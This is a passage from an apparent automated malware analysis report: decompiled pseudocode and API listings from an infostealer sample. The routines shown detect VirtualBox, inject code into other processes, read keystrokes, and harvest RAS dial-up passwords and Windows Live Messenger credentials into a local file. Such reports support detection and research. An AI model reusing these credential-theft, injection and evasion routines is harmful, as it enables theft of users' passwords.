                                    				_v304 = 0;
                                    				_v312 = 0;
                                    				_v316 = 0;
                                    				_v308 = 0;
                                    				_push(_t61);
                                    				_push(0x4052c4);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t61 + 0xfffffec8;
                                    				_t58 = E0040508C(2, 0);
                                    				_v300 = 0x128;
                                    				while(E004050CC(_t58,  &_v300) != 0) {
                                    					E00401D24( &_v308, 0x104,  &_v264);
                                    					E00404740(_v308, 0,  &_v304, _t56, _t58, __eflags);
                                    					_push(_v304);
                                    					E00404740("VBoxService.exe", 0,  &_v316, _t56, _t58, __eflags);
                                    					E00401CAC( &_v312, E00401F48(_v316));
                                    					_pop(_t53);
                                    					_t35 = E0040202C(_v312, _t53);
                                    					__eflags = _t35;
                                    					if(_t35 <= 0) {
                                    						continue;
                                    					} else {
                                    						CloseHandle(_t58);
                                    					}
                                    					L5:
                                    					_pop(_t54);
                                    					 *[fs:eax] = _t54;
                                    					_push(E004052CB);
                                    					return E00401AE4( &_v316, 4);
                                    				}
                                    				CloseHandle(_t58);
                                    				goto L5;
                                    			}

                                    APIs
                                    • CloseHandle.KERNEL32(00000000), ref: 00405282
                                    • CloseHandle.KERNEL32(00000000), ref: 004052A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
• Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID: VBoxService.exe
                                    • API String ID: 2962429428-2802435167
                                    • Opcode ID: dfea2f74cef867659bb920515f5cb2bbaa2be718a1e003b5bf27e31b616b6916
                                    • Instruction ID: ff1f50b1f712d9e83e418e106ccd5f3ee627a2592b30da2e2b1bb43fe4630877
                                    • Opcode Fuzzy Hash: dfea2f74cef867659bb920515f5cb2bbaa2be718a1e003b5bf27e31b616b6916
                                    • Instruction Fuzzy Hash: 4D214F30A016188FD761EB25CC416DE76B5EF49314F5040FAF508F3281DB389F818E98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0040AEBC(void* __eax, long __ecx, void* __edx) {
                                    				long _v20;
                                    				void* _t8;
                                    				long _t13;
                                    				void* _t14;
                                    				void* _t15;
                                    				void* _t16;
                                    				SIZE_T* _t17;
                                    
                                    				_t17 = _t16 + 0xfffffff8;
                                    				_t13 = __ecx;
                                    				_t15 = __edx;
                                    				_t14 = __eax;
                                    				_t8 = VirtualAllocEx(__eax, 0, __ecx, 0x3000, 0x40);
                                    				VirtualProtectEx(_t14, _t8, _t13, 0x40,  &_v20);
                                    				if(_t8 != 0 && WriteProcessMemory(_t14, _t8, _t15, _t13, _t17) == 0) {
                                    					_t8 = 0;
                                    				}
                                    				return _t8;
                                    			}

                                    APIs
                                    • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,00000040), ref: 0040AED4
                                    • VirtualProtectEx.KERNEL32(00000000,00000000,00000000,00000040,00000040,00000000,00000000,00000000,00003000,00000040), ref: 0040AEE5
                                    • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000040,00000040,00000000,00000000,00000000,00003000,00000040), ref: 0040AEF3
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
• Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$AllocMemoryProcessProtectWrite
                                    • String ID:
                                    • API String ID: 4073123320-0
                                    • Opcode ID: f493a3abc642431a14bc55cc0decca4829c7a62d1701b1cc0c8d474c002842f3
                                    • Instruction ID: 04b6d850f764c93e9d2b28317530c39f193fb0b34fce4645c0d07a737dcea716
                                    • Opcode Fuzzy Hash: f493a3abc642431a14bc55cc0decca4829c7a62d1701b1cc0c8d474c002842f3
                                    • Instruction Fuzzy Hash: 38E030623466543AE23014575C86FAB5A8CCBC6BA5F10013EBB04B62C0E96AAE0551BD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0040B0B8(int* __ecx, void* __edx) {
                                    				int* _v8;
                                    				short _v10;
                                    				char _v266;
                                    				int* _t15;
                                    
                                    				_v8 = __ecx;
                                    				_t15 = _v8;
                                    				if(__edx == 0x100) {
                                    					GetKeyboardState( &_v266);
                                    					ToAscii( *_t15, _t15[1],  &_v266,  &_v10, 0);
                                    				}
                                    				return 1;
                                    			}

                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 0040B0DD
                                    • ToAscii.USER32(?,?,?,?,00000000), ref: 0040B0F6
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
• Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AsciiKeyboardState
                                    • String ID:
                                    • API String ID: 1779786364-0
                                    • Opcode ID: 1a8a745c7c25f85aaab6bcb3023bac942ae0cb84df644b1a1d9648621a4d1486
                                    • Instruction ID: f0005aa7a374a961e5e6f82646fdc64f58cd4f7077afd7099a87c19bc913b3b9
                                    • Opcode Fuzzy Hash: 1a8a745c7c25f85aaab6bcb3023bac942ae0cb84df644b1a1d9648621a4d1486
                                    • Instruction Fuzzy Hash: E2F0C072A00118BFDB10DADDDD81FCBB7AC9B18315F0041B6B908E7281DA759E5057A5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004032F5(void* __eax, void* __ebx, void* __esi) {
                                    				long _t7;
                                    
                                    				 *((intOrPtr*)(__ebx + 0x3e)) =  *((intOrPtr*)(__ebx + 0x3e)) + __esi;
                                    				 *0x40e590 = GetProcessHeap();
                                    				 *0x40e000 = E004029DC;
                                    				 *0x40e02c = 0xd7b0;
                                    				 *0x40e1f8 = 0xd7b0;
                                    				 *0x40e3c4 = 0xd7b0;
                                    				E0040299C();
                                    				_t7 = GetCurrentThreadId();
                                    				 *0x40e01c = _t7;
                                    				return _t7;
                                    			}

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
• Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentHeapProcessThread
                                    • String ID:
                                    • API String ID: 3484890527-0
                                    • Opcode ID: 27b3b6974042531a664cb1fe38eba8a8a9cd419ee23f0ea59df76cef04af70e6
                                    • Instruction ID: 69e3deb0adb312a31fe3813bb06994c51432f8a8989e71ac7a29f5a8f1f4c54e
                                    • Opcode Fuzzy Hash: 27b3b6974042531a664cb1fe38eba8a8a9cd419ee23f0ea59df76cef04af70e6
                                    • Instruction Fuzzy Hash: 1CD017B4810260DAE300EF63AF451087A60BF05308700AD7FE100BA2B2FBB842619B9E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
• Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: DAEMON
                                    • API String ID: 0-1922372065
                                    • Opcode ID: b483fd6bf445ce8cac489cd1765a37d26c006e70009b3f4b04475a6d305492bb
                                    • Instruction ID: ff9dd751d756866e208d31830bb566c9fb1a044535b2460e430827fd69309c63
                                    • Opcode Fuzzy Hash: b483fd6bf445ce8cac489cd1765a37d26c006e70009b3f4b04475a6d305492bb
                                    • Instruction Fuzzy Hash: 39E04F31240A44ABDB129B158C12F57B7ECD345B44F1144B1F901F3AD1D279EE10A869
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
• Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 011f3edd17df6e3a0d3e9760639db1b7d270aba6d112c1f8f5362d8ca4fcb0d0
                                    • Instruction ID: 7f94392c905d70edd5cae979f2db0d97197127d2bd1df01fa9d4973e5e5bf9ed
                                    • Opcode Fuzzy Hash: 011f3edd17df6e3a0d3e9760639db1b7d270aba6d112c1f8f5362d8ca4fcb0d0
                                    • Instruction Fuzzy Hash: ADE02630809A048EEF24CB4595052ABB7F8D742324F5484B6D00C673C0D67B9A94CE08
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
• Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ba6bc1ae00c6916c74ed3910e531681c6c6ecc516f8f8c804ff5c88a679010f2
                                    • Instruction ID: 4236f64593cb35683e782d4f7c4e11c0f3d3bdd44736c68a4ca992c86675be2c
                                    • Opcode Fuzzy Hash: ba6bc1ae00c6916c74ed3910e531681c6c6ecc516f8f8c804ff5c88a679010f2
                                    • Instruction Fuzzy Hash: 13B00279261650CFD791CB08C598F40B7F5FB48B74F8685D5E8498B663C378E914CA04
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 69%
                                    			E00408238(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                    				intOrPtr* _v8;
                                    				signed int _v12;
                                    				char _v16;
                                    				signed int _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v52;
                                    				struct _OSVERSIONINFOA _v200;
                                    				char _v476;
                                    				char _v733;
                                    				char _v1248;
                                    				char _v1252;
                                    				signed int _v3020;
                                    				char _v3024;
                                    				char _v3028;
                                    				char _v3284;
                                    				char _v3288;
                                    				char _v3292;
                                    				char _t130;
                                    				void* _t138;
                                    				CHAR* _t167;
                                    				void* _t181;
                                    				CHAR* _t185;
                                    				CHAR* _t190;
                                    				void* _t199;
                                    				void* _t201;
                                    				int _t215;
                                    				intOrPtr* _t216;
                                    				signed int* _t222;
                                    				void* _t223;
                                    				intOrPtr _t225;
                                    				intOrPtr _t230;
                                    				CHAR* _t253;
                                    				void* _t254;
                                    				signed int _t256;
                                    				void* _t259;
                                    
                                    				_t255 = __esi;
                                    				_t252 = __edi;
                                    				_t211 = __ebx;
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_push(__edi);
                                    				_v3288 = 0;
                                    				_v3292 = 0;
                                    				_v3028 = 0;
                                    				_v3024 = 0;
                                    				_v24 = 0;
                                    				_v28 = 0;
                                    				_v32 = 0;
                                    				_v40 = 0;
                                    				_v44 = 0;
                                    				_v48 = 0;
                                    				_v8 = __eax;
                                    				_push(_t259);
                                    				_push(0x40861b);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t259 + 0xfffff328;
                                    				E00401AC0(_v8);
                                    				_v20 = E00407FF0();
                                    				if(_v20 != 0) {
                                    					_push(_v20);
                                    					E00402FBC();
                                    					 *_v24 = 0x108;
                                    					_v12 = 0x108 * _v20;
                                    					_push( &_v20);
                                    					_push( &_v12);
                                    					_t130 = _v24;
                                    					_push(_t130);
                                    					_push(0);
                                    					_push(0);
                                    					L00407B84();
                                    					if(_t130 == 0) {
                                    						_v200.dwOSVersionInfoSize = 0x94;
                                    						GetVersionExA( &_v200);
                                    						E00402074( &_v28, 0x105);
                                    						E00402074( &_v32, 0x105);
                                    						if(_v200.dwPlatformId == 2 && _v200.dwMajorVersion >= 5) {
                                    							_push(0);
                                    							_push(0x1a);
                                    							_t199 = E00401F9C( &_v28);
                                    							_push(_t199);
                                    							_push(0);
                                    							L00407B7C();
                                    							_t267 = _t199;
                                    							if(_t199 != 0) {
                                    								E00407F4C(_v28,  &_v3024, _t267);
                                    								E00401B58( &_v28, _v3024);
                                    							}
                                    							_push(0);
                                    							_push(0x23);
                                    							_t201 = E00401F9C( &_v32);
                                    							_push(_t201);
                                    							_push(0);
                                    							L00407B7C();
                                    							_t268 = _t201;
                                    							if(_t201 != 0) {
                                    								E00407F4C(_v32,  &_v3028, _t268);
                                    								E00401B58( &_v32, _v3028);
                                    							}
                                    							E00407E40(_t211, 1, _t252, _t255, _t268);
                                    						}
                                    						_v36 = 0xffffffff;
                                    						_t138 = _v20 - 1;
                                    						if(_t138 >= 0) {
                                    							_v52 = _t138 + 1;
                                    							_t256 = 0;
                                    							do {
                                    								_v1252 = 0x41c;
                                    								_t214 = (_t256 << 5) + _t256;
                                    								E00401258(_v24 + 4 + ((_t256 << 5) + _t256) * 8, 0x100,  &_v1248);
                                    								_push( &_v36);
                                    								_push( &_v1252);
                                    								_push(0);
                                    								L00407B8C();
                                    								_v12 = 0x6e8;
                                    								E00401414( &_v3020, _v12);
                                    								_v3020 = _v12;
                                    								_t222 =  &_v3020;
                                    								E004081BC(0, _v24 + 4 + ((_t256 << 5) + _t256) * 8,  &_v16, 0,  &_v12);
                                    								if(_v200.dwPlatformId == 2 && _v200.dwMajorVersion >= 5) {
                                    									if( *_v28 != 0) {
                                    										L15:
                                    										E00401CAC( &_v40,  &_v1248);
                                    										E00403268(_v40, _t214, _t222,  &_v44, _t256, _t274);
                                    										_t167 = E00401F9C( &_v28);
                                    										_t253 = E00401F48(_v40);
                                    										_t215 = GetPrivateProfileIntA(_t253, "DialParamsUID", 0, _t167);
                                    										if(_t215 == 0) {
                                    											_t215 = GetPrivateProfileIntA(_t253, "DialParamsUID", 0, E00401F9C( &_v32));
                                    										}
                                    										if(_t215 == 0) {
                                    											_t190 = E00401F9C( &_v28);
                                    											_t215 = GetPrivateProfileIntA(E00401F48(_v44), "DialParamsUID", 0, _t190);
                                    										}
                                    										if(_t215 == 0) {
                                    											_t185 = E00401F9C( &_v32);
                                    											_t215 = GetPrivateProfileIntA(E00401F48(_v44), "DialParamsUID", 0, _t185);
                                    										}
                                    										if(_t215 > 0) {
                                    											E00402BC0( &_v3284, _t215, 0);
                                    											E00401D18( &_v48,  &_v3284, 0);
                                    											_t254 = 0x100;
                                    											_t216 = 0x40e9bc;
                                    											do {
                                    												E00401E94( *_t216, _v48);
                                    												if(0 == 0 &&  *((intOrPtr*)(_t216 + 4)) != 0) {
                                    													_t87 = _t216 + 4; // 0x0
                                    													_push(E00401D50( *_t87));
                                    													_t88 = _t216 + 4; // 0x0
                                    													_t181 = E00401F48( *_t88);
                                    													_pop(_t223);
                                    													E00408038( &_v476, _t223, _t181);
                                    												}
                                    												_t216 = _t216 + 8;
                                    												_t254 = _t254 - 1;
                                    											} while (_t254 != 0);
                                    										}
                                    									} else {
                                    										_t274 =  *_v32;
                                    										if( *_v32 != 0) {
                                    											goto L15;
                                    										}
                                    									}
                                    								}
                                    								if( &_v733 != 0 &&  &_v476 != 0) {
                                    									_push( *_v8);
                                    									_push("RAS Passwords |");
                                    									E00401CAC( &_v3288,  &_v733);
                                    									_push(_v3288);
                                    									_push(0x40865c);
                                    									E00401CAC( &_v3292,  &_v476);
                                    									_push(_v3292);
                                    									_push(0x40865c);
                                    									_push(0x408668);
                                    									E00401E10();
                                    								}
                                    								_t256 = _t256 + 1;
                                    								_t100 =  &_v52;
                                    								 *_t100 = _v52 - 1;
                                    							} while ( *_t100 != 0);
                                    						}
                                    					}
                                    				}
                                    				_pop(_t225);
                                    				 *[fs:eax] = _t225;
                                    				_push(E00408622);
                                    				E00401AE4( &_v3292, 2);
                                    				E00401AE4( &_v3028, 2);
                                    				E00401AE4( &_v48, 3);
                                    				E00401AE4( &_v32, 2);
                                    				_t230 =  *0x408214; // 0x408218
                                    				return E00402FC8( &_v24, _t230);
                                    			}

                                    APIs
                                      • Part of subcall function 00407FF0: RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 00408017
                                    • RasEnumEntriesA.RASAPI32(00000000,00000000,?,?,?), ref: 004082D5
                                    • GetVersionExA.KERNEL32(00000094), ref: 004082F3
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000094), ref: 00408333
                                    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00408367
                                      • Part of subcall function 00407F4C: lstrlen.KERNEL32(00000000,?,?,0040837E,00000000,00000000,00000023,00000000,00000000,00000000,0000001A,00000000,00000094), ref: 00407F68
                                    • RasGetEntryDialParamsA.RASAPI32(00000000,0000041C,FFFFFFFF), ref: 004083DF
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 00408484
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084A0
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084C4
                                    • GetPrivateProfileIntA.KERNEL32(00000000,DialParamsUID,00000000,00000000), ref: 004084E8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: PrivateProfile$EntriesEnumFolderPathSpecial$DialEntryParamsVersionlstrlen
                                    • String ID: DialParamsUID$RAS Passwords |
                                    • API String ID: 606077693-3751168726
                                    • Opcode ID: fbe06dde2b49a42d26d1befe1d029615117769fb4e2dbfe38565cae11eece56a
                                    • Instruction ID: 7375f334a108091beab50651aa9ecc72c5d4f12faf085ce0e41049e672a00ba2
                                    • Opcode Fuzzy Hash: fbe06dde2b49a42d26d1befe1d029615117769fb4e2dbfe38565cae11eece56a
                                    • Instruction Fuzzy Hash: 45B12070E002199BDB10EFA5CD82BDEB7B9AF44308F1045BBE544B72D1DB78AE458B58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 60%
                                    			E00409D28(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				char _v12;
                                    				struct HINSTANCE__* _v16;
                                    				char _v20;
                                    				char _v24;
                                    				intOrPtr _v28;
                                    				char _v32;
                                    				char _v36;
                                    				void* _t47;
                                    				intOrPtr* _t70;
                                    				void* _t74;
                                    				intOrPtr _t76;
                                    				intOrPtr _t78;
                                    				signed int _t90;
                                    				void* _t91;
                                    				intOrPtr _t93;
                                    
                                    				_t89 = __esi;
                                    				_t70 = __eax;
                                    				 *[fs:eax] = _t93;
                                    				E00401AC0(__eax);
                                    				_v16 = LoadLibraryA("advapi32.dll");
                                    				 *0x40f1dc = GetProcAddress(_v16, "CredEnumerateA");
                                    				 *0x40f1e0 = GetProcAddress(_v16, "CredFree");
                                    				 *0x40f1dc("WindowsLive:name=*", 0,  &_v12,  &_v8,  *[fs:eax], 0x409e71, _t93, __edi, __esi, __ebx, 0, 0, 0, 0, 0, 0, 0, 0, _t91);
                                    				if(_v12 != 0) {
                                    					_t47 = _v12 - 1;
                                    					if(_t47 >= 0) {
                                    						_v20 = _t47 + 1;
                                    						_t90 = 0;
                                    						do {
                                    							_push( *_t70);
                                    							_push("Messenger|");
                                    							E00401CAC( &_v24,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t90 * 4)) + 0x30)));
                                    							_push(_v24);
                                    							_push(0x409edc);
                                    							E00401E10();
                                    							_push( *_t70);
                                    							E00409C1C( *((intOrPtr*)( *((intOrPtr*)(_v8 + _t90 * 4)) + 0x1c)), _t70,  &_v32,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t90 * 4)) + 0x18)),  *((intOrPtr*)(_v8 + _t90 * 4)), _t90);
                                    							_push(_v32);
                                    							_push(0x409edc);
                                    							E00401E10();
                                    							E00401CAC(_t70, E00401F48(_v28));
                                    							_t90 = _t90 + 1;
                                    							_t21 =  &_v20;
                                    							 *_t21 = _v20 - 1;
                                    							_t97 =  *_t21;
                                    						} while ( *_t21 != 0);
                                    					}
                                    					FreeLibrary(_v16);
                                    					_push(E00401D50( *_t70));
                                    					E00406008( &_v36);
                                    					E00401D58( &_v36, "xxxyyyzzz.dat");
                                    					_pop(_t74);
                                    					E00405D70(_v36, _t70, _t74,  *_t70, _t89, _t97);
                                    				}
                                    				_pop(_t76);
                                    				 *[fs:eax] = _t76;
                                    				_push(E00409E78);
                                    				E00401AE4( &_v36, 4);
                                    				_t78 =  *0x409bec; // 0x409bf0
                                    				return E00402FC8( &_v8, _t78);
                                    			}

                                    APIs
                                    • LoadLibraryA.KERNEL32(advapi32.dll,00000000,00409E71,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409D54
                                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00409D65
                                    • GetProcAddress.KERNEL32(?,CredFree), ref: 00409D78
                                    • FreeLibrary.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E1B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryProc$FreeLoad
                                    • String ID: CredEnumerateA$CredFree$Messenger|$WindowsLive:name=*$advapi32.dll$xxxyyyzzz.dat
                                    • API String ID: 2256533930-2325380974
                                    • Opcode ID: f9fba9f8a1e8e21ee8b509bdb417b60c27fbde2a90de665e2bcbe9999123e56f
                                    • Instruction ID: 58c175fa7aa483102e543733577c5d45540cb7646ec2fd880dc3ea0f10caa25c
                                    • Opcode Fuzzy Hash: f9fba9f8a1e8e21ee8b509bdb417b60c27fbde2a90de665e2bcbe9999123e56f
                                    • Instruction Fuzzy Hash: 28311D75A00209AFDB01EFA5C842A9EB7B9EB48704B60447BF501B72D2D778ED058B98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 77%
                                    			E0040806C(void* __eax, void* __ebx, void* __esi) {
                                    				char _v8;
                                    				char _v12;
                                    				CHAR* _t11;
                                    				struct HINSTANCE__* _t12;
                                    				CHAR* _t18;
                                    				struct HINSTANCE__* _t19;
                                    				CHAR* _t24;
                                    				struct HINSTANCE__* _t25;
                                    				CHAR* _t30;
                                    				struct HINSTANCE__* _t31;
                                    				intOrPtr _t44;
                                    				intOrPtr _t51;
                                    
                                    				_push(0);
                                    				_push(0);
                                    				_t48 = __eax;
                                    				_push(_t51);
                                    				_push(0x408182);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t51;
                                    				if( *0x40d094 != 0) {
                                    					if( *0x40d098 == 0) {
                                    						E00401D9C( &_v12, 0x4081ac, __eax);
                                    						_t11 = E00401F48(_v12);
                                    						_t12 =  *0x40e9b8; // 0x0
                                    						GetProcAddress(_t12, _t11);
                                    					} else {
                                    						_t18 = E00401F48(__eax);
                                    						_t19 =  *0x40e9b8; // 0x0
                                    						GetProcAddress(_t19, _t18);
                                    					}
                                    					L11:
                                    					_pop(_t44);
                                    					 *[fs:eax] = _t44;
                                    					_push(E00408189);
                                    					return E00401AE4( &_v12, 2);
                                    				}
                                    				 *0x40e9b8 = LoadLibraryA("rasapi32.dll");
                                    				if( *0x40e9b8 == 0) {
                                    					 *0x40e9b8 = LoadLibraryA("rnaph.dll");
                                    					L5:
                                    					if( *0x40e9b8 != 0) {
                                    						_t24 = E00401F48(_t48);
                                    						_t25 =  *0x40e9b8; // 0x0
                                    						if(GetProcAddress(_t25, _t24) != 0) {
                                    							 *0x40d094 = 1;
                                    							 *0x40d098 = 1;
                                    						}
                                    					}
                                    					goto L11;
                                    				}
                                    				E00401D9C( &_v8, 0x4081ac, _t48);
                                    				_t30 = E00401F48(_v8);
                                    				_t31 =  *0x40e9b8; // 0x0
                                    				if(GetProcAddress(_t31, _t30) == 0) {
                                    					goto L5;
                                    				} else {
                                    					 *0x40d094 = 1;
                                    					goto L11;
                                    				}
                                    			}

                                    APIs
                                    • LoadLibraryA.KERNEL32(rasapi32.dll,00000000,00408182,?,?,?,00000000,00000000), ref: 00408099
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004080CA
                                    • LoadLibraryA.KERNEL32(rnaph.dll,rasapi32.dll,00000000,00408182,?,?,?,00000000,00000000), ref: 004080E6
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408107
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408139
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408160
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: rasapi32.dll$rnaph.dll
                                    • API String ID: 2238633743-3306964077
                                    • Opcode ID: 55af25baebdb74a9f019e34cf259ce010ede8285420b2e199dd43019a3ddbeb4
                                    • Instruction ID: b6a237a201236b193b27059562e9ff659002eca3acc9512b3faa464904049123
                                    • Opcode Fuzzy Hash: 55af25baebdb74a9f019e34cf259ce010ede8285420b2e199dd43019a3ddbeb4
                                    • Instruction Fuzzy Hash: 88218070604240AFE765EBB59F42B5A369C9B08308F14487EF184BB3D2CB7C9D96835D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 44%
                                    			E004063FC(long __eax, intOrPtr* __edx) {
                                    				void* _v8;
                                    				void* _t8;
                                    				_Unknown_base(*)()* _t13;
                                    				intOrPtr* _t29;
                                    				intOrPtr _t37;
                                    				long _t43;
                                    				intOrPtr _t47;
                                    				intOrPtr _t49;
                                    
                                    				_t47 = _t49;
                                    				_t29 = __edx;
                                    				_t43 = __eax;
                                    				E00401AC0(__edx);
                                    				_t8 = OpenProcess(0x410, 0, _t43);
                                    				_v8 = _t8;
                                    				if(_v8 == 0) {
                                    					return _t8;
                                    				} else {
                                    					_push(_t47);
                                    					_push(0x4064a9);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t49;
                                    					E00402074(_t29, 0x104);
